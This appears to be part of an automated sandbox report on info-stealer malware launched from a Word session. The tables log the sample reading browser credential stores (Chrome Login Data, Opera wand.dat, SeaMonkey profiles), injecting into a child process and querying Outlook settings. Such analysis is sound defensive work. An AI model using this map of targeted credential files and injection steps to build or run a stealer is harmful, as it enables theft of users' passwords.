| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe |
|
1 | |
| File | Get Info | filename = C:\Program Files\Sea Monkey\nss3.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, desired_access = GENERIC_READ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, size = 100, size_out = 100 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, size = 2048, size_out = 2048 |
|
4 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, size = 16, size_out = 16 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 100, size_out = 100 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 2048, size_out = 2048 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 16, size_out = 16 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 2048, size_out = 2048 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\pnacl\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\pnacl\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Apple Computer\Preferences\keychain.plist, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Opera\Opera\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Opera\Opera7\profile\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\ProgramData\9F1C.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 3 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 11 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 9 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 8 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 17 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 15 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 14 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 12 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 13 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1C.tmp, size = 2 |
|
1 |
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
| Command Line | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:15 |
| Information | Value |
|---|---|
| PID | 0xc80 |
| Parent PID | 0xb98 (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C84
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xbb0 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xbb0 | address = 0x7ffda008, size = 4 |
|
1 | |
| Modify Control Flow | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xbb0 | os_tid = 0xc84, address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-08-31 14:52:22 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x763a418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x763a1f61 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x763a1e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x763a76e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x763a3879 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x763524d8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76382111 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76392510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7638b009 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x775e89be |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x775dc02a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x775dc0d2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76383f78 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x775e8bfb |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x775db567 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77605998 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x775d2251 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x775d28f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76382004 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x763d9aa9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x763df3cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x763aebc6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetDateFormatEx, address_out = 0x763ef29f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x763853a5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTimeFormatEx, address_out = 0x763ef21a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x763df70b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsValidLocaleName, address_out = 0x763df71b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x763df72b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x7638eb4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String |
|
1 | ||
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77460000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = MSIApplicationLCID, data = 77 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Microsoft Office\Root\Office16\OLMAPI32.DLL, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll |
|
1 |
